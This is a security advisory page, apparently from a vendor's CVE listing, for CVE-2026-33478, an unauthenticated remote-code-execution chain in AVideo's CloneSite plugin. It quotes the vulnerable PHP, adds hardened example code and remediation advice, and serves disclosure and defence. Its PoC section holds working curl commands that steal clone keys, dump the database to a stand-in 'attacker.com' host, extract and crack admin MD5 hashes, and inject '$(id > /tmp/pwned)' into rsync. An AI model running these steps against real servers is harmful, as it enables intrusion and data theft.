Summary
Multiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The clones.json.php endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via cloneServer.json.php. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in cloneClient.json.php to execute arbitrary system commands.
Details
Step 1: Clone Key Disclosure
plugin/CloneSite/clones.json.php:1-8 performs no authentication check at all:
<?php
require_once '../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/CloneSite/Objects/Clones.php';
header('Content-Type: application/json');
$rows = Clones::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}
The response includes the key field for every registered clone, which is the sole authentication credential for clone operations.
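A hardened version of that endpoint, added here as an example rather than taken from AVideo; it assumes User::isAdmin() and forbiddenPage() are the project's existing helpers and that Clones::getAll() returns rows as associative arrays with a key column:

```php
<?php
// Added example (not AVideo's own code): clones.json.php rewritten so that it
// requires an authenticated admin session and never returns the clone key.
// User::isAdmin() and forbiddenPage() are assumed to be the helpers AVideo's
// other endpoints use, and Clones::getAll() is assumed to return associative
// arrays with a 'key' column, as the advisory describes.
require_once '../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/CloneSite/Objects/Clones.php';

header('Content-Type: application/json');

if (!User::isAdmin()) {
    // Same answer for anonymous and non-admin callers: no hint that clones exist.
    forbiddenPage('Admin only'); // assumed to send a 403 and stop the script
}

function redactClones(array $rows): array
{
    // Drop the secret before serialization and keep only a short fingerprint so
    // an admin can tell entries apart without the key ever leaving the server.
    return array_map(static function (array $row): array {
        if (isset($row['key'])) {
            $row['keyFingerprint'] = substr(hash('sha256', (string) $row['key']), 0, 8);
            unset($row['key']);
        }
        return $row;
    }, $rows);
}

echo json_encode(['data' => redactClones(Clones::getAll())]);
```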
Step 2: Database Dump via Stolen Key
In plugin/CloneSite/cloneServer.json.php:73-97, once the key passes Clones::thisURLCanCloneMe(), the server executes mysqldump and writes the result to a web-accessible directory:
$cmd = "mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} "
." --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} > $sqlFile";
exec($cmd . " 2>&1", $output, $return_val);
The SQL file path is returned in the JSON response and is downloadable.
Step 3: Admin Credential Extraction
In objects/user.php:1798, passwords are stored as unsalted MD5:
$passEncoded = md5($pass);
The users table in the dump contains user, password (MD5), and isAdmin fields. MD5 hashes crack in seconds.
Step 4: Command Injection via Rsync
In plugin/CloneSite/cloneClient.json.php:259, the videosDir value from the clone server's response is interpolated unsanitized into the rsync command:
$rsync = "sshpass -p '{password}' rsync -av ... {$objClone->cloneSiteSSHUser}@{$objClone->cloneSiteSSHIP}:{$json->videosDir} ...";
exec($rsync . " 2>&1", $output, $return_val);
An admin who controls a clone server (or an attacker who has become admin) can inject arbitrary commands via the videosDir field.
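One way to build that command safely, added here as an example and not AVideo's own code; it assumes $objClone and $json carry the fields the advisory quotes and that a validation failure should abort the clone rather than proceed:

```php
<?php
// Added example (not AVideo's own code): a hardened way to build the rsync
// command from a clone server's response. $json->videosDir is untrusted, so it
// is checked against a strict allowlist before use, and every interpolated
// value is wrapped with escapeshellarg() so shell metacharacters stay inert.
// $objClone and $json are assumed to carry the fields the advisory quotes.

function validateVideosDir(string $dir): string
{
    // Absolute path, safe characters only, and no ".." segment anywhere.
    if (!preg_match('#\A/(?:[A-Za-z0-9_.-]+/)*[A-Za-z0-9_.-]*\z#', $dir)
        || strpos($dir, '..') !== false) {
        throw new InvalidArgumentException('Rejected videosDir from clone server');
    }
    return rtrim($dir, '/') . '/';
}

function validateSshIdentity(string $user, string $host): void
{
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $user)
        || !preg_match('/\A[A-Za-z0-9_.:-]+\z/', $host)) {
        throw new InvalidArgumentException('Rejected SSH user or host');
    }
}

function buildRsyncCommand(object $objClone, object $json, string $password, string $localDir): string
{
    $remoteDir = validateVideosDir((string) $json->videosDir);
    validateSshIdentity((string) $objClone->cloneSiteSSHUser, (string) $objClone->cloneSiteSSHIP);
    $remote = escapeshellarg(
        $objClone->cloneSiteSSHUser . '@' . $objClone->cloneSiteSSHIP . ':' . $remoteDir
    );
    // escapeshellarg() single-quotes each value, so "$(...)" is never expanded.
    return 'sshpass -p ' . escapeshellarg($password)
        . ' rsync -av ' . $remote . ' ' . escapeshellarg($localDir);
}

// Constructed sample input: the PoC's malicious videosDir is refused outright.
$clone = (object) ['cloneSiteSSHUser' => 'avideo', 'cloneSiteSSHIP' => '203.0.113.10'];
$good  = (object) ['videosDir' => '/var/www/html/AVideo/videos/'];
$bad   = (object) ['videosDir' => '/tmp$(id > /tmp/pwned)'];

echo buildRsyncCommand($clone, $good, 's3cret', '/var/www/html/AVideo/videos/'), PHP_EOL;
try {
    buildRsyncCommand($clone, $bad, 's3cret', '/var/www/html/AVideo/videos/');
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
```

sshpass -p still exposes the password in the process list; sshpass -e with the password in the SSHPASS environment variable avoids that.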
PoC
# Step 1: Steal clone keys (unauthenticated)
curl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'
# Output: "a1b2c3d4e5f6..."
# Step 2: Trigger database dump
CLONE_KEY="a1b2c3d4e5f6..."
curl -s "http://target/plugin/CloneSite/cloneServer.json.php" \
--data "url=http://attacker.com&key=${CLONE_KEY}&useRsync=0" | jq '.sqlFile'
# Output: "Clone_mysqlDump_1234567890.sql"
# Step 3: Download the dump and extract admin credentials
curl -s "http://target/videos/clones/Clone_mysqlDump_1234567890.sql" \
| grep -A2 "INSERT INTO.*users" \
| grep -oP "admin','[a-f0-9]{32}"
# Output: admin','5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of "password")
# Step 4: Crack MD5 (trivial)
echo -n "5f4dcc3b5aa765d61d8327deb882cf99" | hashcat -m 0 -a 0 rockyou.txt
# Output: password
# Step 5: Login as admin, configure CloneSite with malicious server
# The attacker's clone server returns videosDir containing: /tmp$(id > /tmp/pwned)
# When rsync executes, the $(id) is evaluated by the shell
Impact
- Complete server compromise: Unauthenticated attacker achieves arbitrary command execution as the web server user
- Full database disclosure: The entire database (users, videos, configurations, secrets) is exfiltrated
- No user interaction: Every step is automated, no clicks or social engineering required
- Credential theft: All user passwords (MD5) are trivially recoverable
- Lateral movement: Database credentials and SSH credentials (stored encrypted in the plugins table) may enable access to other systems
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2026-33478 has a CVSS score of 10.0 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions: wwbn/avideo (composer) versions <= 26.0.
Security releases: no fixed version is listed yet.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33478? CVE-2026-33478 is a critical-severity OS command injection vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2026-33478? CVE-2026-33478 has a CVSS score of 10.0 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of wwbn/avideo are affected by CVE-2026-33478? wwbn/avideo (composer) versions <= 26.0 are affected.
- Is there a fix for CVE-2026-33478? No fixed version is listed for CVE-2026-33478 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33478 exploitable, and should I be worried? Whether CVE-2026-33478 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-33478 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33478? No fixed version is listed yet. In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.